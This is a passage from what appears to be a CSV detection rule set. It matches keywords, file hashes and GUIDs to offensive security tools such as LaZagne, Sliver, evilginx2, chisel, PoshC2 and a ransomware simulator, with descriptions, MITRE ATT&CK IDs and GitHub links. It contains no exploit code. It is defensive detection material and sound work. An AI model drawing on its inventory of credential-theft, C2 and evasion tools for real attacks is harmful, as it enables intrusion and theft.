TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3*",".{0,1000}c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333*",".{0,1000}c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1*",".{0,1000}c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd*",".{0,1000}c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f*",".{0,1000}c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0*",".{0,1000}c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53*",".{0,1000}c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865*",".{0,1000}c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d*",".{0,1000}c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f*",".{0,1000}c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*C0E67E76-1C78-4152-9F79-FA27B4F7CCCA*",".{0,1000}C0E67E76\-1C78\-4152\-9F79\-FA27B4F7CCCA.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*C10599E3-5A79-484F-940B-E4B61F256466*",".{0,1000}C10599E3\-5A79\-484F\-940B\-E4B61F256466.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*c1090dbc-f2f7-4d90-a241-86e0c0217786*",".{0,1000}c1090dbc\-f2f7\-4d90\-a241\-86e0c0217786.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6*",".{0,1000}c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712*",".{0,1000}c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade*",".{0,1000}c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*C13C80ED-ED7A-4F27-93B1-DE6FD30A7B43*",".{0,1000}C13C80ED\-ED7A\-4F27\-93B1\-DE6FD30A7B43.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094*",".{0,1000}c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf*",".{0,1000}c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0*",".{0,1000}c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf*",".{0,1000}c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1*",".{0,1000}c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff*",".{0,1000}c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*C2 Client*",".{0,1000}C2\sClient.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*C2 Framework for villains*",".{0,1000}C2\sFramework\sfor\svillains.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*C2 Nimplant Server*",".{0,1000}C2\sNimplant\sServer.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*C2 Server*",".{0,1000}C2\sServer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*c2 target,eg 127.0.0.1:64535*",".{0,1000}c2\starget,eg\s127\.0\.0\.1\:64535.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2.KillDate*",".{0,1000}C2\.KillDate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*c2.striker.*",".{0,1000}c2\.striker\..{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*C2.UserAgent*",".{0,1000}C2\.UserAgent.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*C2/C2Server.*",".{0,1000}C2\/C2Server\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*C2_RPC_functions.py*",".{0,1000}C2_RPC_functions\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*c2_server*.py*",".{0,1000}c2_server.{0,1000}\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*c2_server.py *",".{0,1000}c2_server\.py\s.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*c2_server.resources*",".{0,1000}c2_server\.resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*C2_Server-main*",".{0,1000}C2_Server\-main.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*c2_service.sh*",".{0,1000}c2_service\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60*",".{0,1000}c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07*",".{0,1000}c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f*",".{0,1000}c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335*",".{0,1000}c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2*",".{0,1000}C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85*",".{0,1000}c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd*",".{0,1000}c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C2concealer -*",".{0,1000}C2concealer\s\-.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*C2concealer-master*",".{0,1000}C2concealer\-master.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA*",".{0,1000}C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394*",".{0,1000}c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*'C2Default'*",".{0,1000}\'C2Default\'.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*c2endpoint.php*",".{0,1000}c2endpoint\.php.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 